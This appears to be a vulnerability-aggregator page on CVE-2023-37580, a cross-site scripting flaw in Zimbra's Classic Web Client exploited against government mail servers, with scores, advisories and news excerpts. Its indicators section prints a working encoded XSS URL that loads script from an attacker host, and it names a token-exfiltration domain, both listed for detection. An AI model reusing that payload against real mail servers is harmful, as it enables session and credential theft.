CVE-2023-37580
published 2023-07-31CVE-2023-37580: Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.
PriorityP181medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2023-08-17
Exploited in the wild
EPSS
59.04%
99.0th percentile
Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| synacor | zimbra_collaboration_suite | — | — |
| synacor | zimbra_collaboration_suite | >= 8.8.0 < 8.8.15 | 8.8.15 |
Detection & IOCsextracted from sources · hover to see the quote
urlhttps://mail.REDACTED[.]com/m/momovetost=acg%22%2F%3E%3Cscript%20src%3D%22https%3A%2F%2Fobsorth%2Eopwtjnpoc%2Eml%2FpQyMSCXWyBWJpIos%2Ejs%22%3E%3C%2Fscript%3E%2F%2F↗
path/m/momoveto?st=
otherhttp.favicon.hash:475145467
othericon_hash="475145467"
- →The XSS is triggered via the `st` parameter in the `/m/momoveto` endpoint of Zimbra Classic Web Client; monitor HTTP requests to this path containing script injection patterns in the `st` parameter. ↗
- →Campaign 4 (Pakistan) exfiltrated Zimbra authentication tokens to ntcpk[.]org; monitor Zimbra server outbound connections to this domain as an indicator of token theft. ↗
- →Most exploitation occurred after the hotfix was pushed to GitHub but before the official patch; monitor for exploitation attempts even on partially-patched or recently-patched instances. ↗
- ·The fix for CVE-2023-37580 was to escape the contents of the `st` parameter before it was set as the value in an HTML object; verify this escaping is present in the deployed version. ↗
- ·The vulnerability affects Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41; the official patch was released July 25, 2023. ↗
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
vulncheck6.1MEDIUM
cisa6.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability
cisa·2023-07-27·CVSS 6.1
CVE-2023-37580 [MEDIUM] CWE-79 Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability
Vulnerability: Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability
Affected: Synacor Zimbra Collaboration Suite (ZCS)
Synacor Zimbra Collaboration Suite (ZCS) contains a cross-site scripting vulnerability impacting the confidentiality and integrity of data.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://wiki.zimbra.com/wiki/Security_Center ; https://nvd.nist.gov/vuln/detail/CVE-2023-37580
Remediation Due Date: 2023-08-17
GHSA
GHSA-vw6f-667c-3jv3: Zimbra Collaboration (ZCS) 8 before 8
ghsa_unreviewed·2023-07-31
CVE-2023-37580 [MEDIUM] CWE-79 GHSA-vw6f-667c-3jv3: Zimbra Collaboration (ZCS) 8 before 8
Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.
VulnCheck
Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability
vulncheck·2023·CVSS 6.1
CVE-2023-37580 [MEDIUM] CWE-79 Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability
Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability
Synacor Zimbra Collaboration Suite (ZCS) contains a cross-site scripting vulnerability impacting the confidentiality and integrity of data.
Affected: Synacor Zimbra Collaboration Suite (ZCS)
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://twitter.com/maddiestone/status/1679542322772721664; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://blog.google/threat-analysis-group/zimbra-0-day-used-to-target-international-government-organizations/; https://ti.qianxin.com/uplo
No detection rules found.
Nuclei
Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2023-37580 [MEDIUM] Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting
Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting
Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.
Template:
id: CVE-2023-37580
info:
name: Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite (ZCS).
reference:
Checkpoint
20th November – Threat Intelligence Report
blogs_checkpoint·2023-11-20·CVSS 7.8
CVE-2023-38831 [HIGH] 20th November – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 20th November – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 20th November, please download our Threat_Intelligence Bulletin .
TOP ATTACKS AND BREACHES
Russia-affiliated military intelligence group SandWorm is reportedly responsible for an attack against 22 critical infrastructure companies in Denmark. The attacks, most severe in Danish history, have compromised industrial control systems and forced companies from the energy sector to work offline.
Medusa ransomware g
Bleepingcomputer
Google: Hackers exploited Zimbra zero-day in attacks on govt orgs
blogs_bleepingcomputer·2023-11-17·CVSS 6.1
CVE-2023-37580 [MEDIUM] Google: Hackers exploited Zimbra zero-day in attacks on govt orgs
## Google: Hackers exploited Zimbra zero-day in attacks on govt orgs
## Bill Toulas
Google's Threat Analysis Group (TAG) has discovered that threat actors exploited a zero-day vulnerability in Zimbra Collaboration email server to steal sensitive data from government systems in multiple countries.
Hackers leveraged a medium-severity security issue now identified as CVE-2023-37580 since June 29, nearly a month before the vendor addressed it in version 8.8.15 Patch 41of the software on July 25.
The flaw is an XSS (cross-site scripting) issue present in the Zimbra Classic Web Client.
## Attack and response timeline
According to Google's threat analysts, the threat actors exploited the vulnerability on government systems in Greece, Moldova, Tunisia, Vietnam, and Pakistan to steal email da
Google Tag
Zimbra 0-day used to target international government organizations
blogs_google_tag·2023-11-16·CVSS 6.1
CVE-2023-37580 [MEDIUM] Zimbra 0-day used to target international government organizations
Threat Analysis Group
## Zimbra 0-day used to target international government organizations
Nov 16, 2023
In June 2023, Google’s Threat Analysis Group (TAG) discovered an in-the-wild 0-day exploit targeting Zimbra Collaboration, an email server many organizations use to host their email. Since discovering the 0-day, now patched as CVE-2023-37580 , TAG has observed four different groups exploiting the same bug to steal email data, user credentials, and authentication tokens. Most of this activity occurred after the initial fix became public on Github. To ensure protection against these types of exploits, TAG urges users and organizations to keep software fully up-to-date and apply security updates as soon as they become available.
## 0-day discovery, hotfix and patch
TAG first discovere
http://www.openwall.com/lists/oss-security/2023/11/17/2https://wiki.zimbra.com/wiki/Security_Centerhttps://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policyhttp://www.openwall.com/lists/oss-security/2023/11/17/2https://wiki.zimbra.com/wiki/Security_Centerhttps://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policyhttps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-37580
2023-07-31
Published
2023-07-27
Added to CISA KEV
Exploited in the wild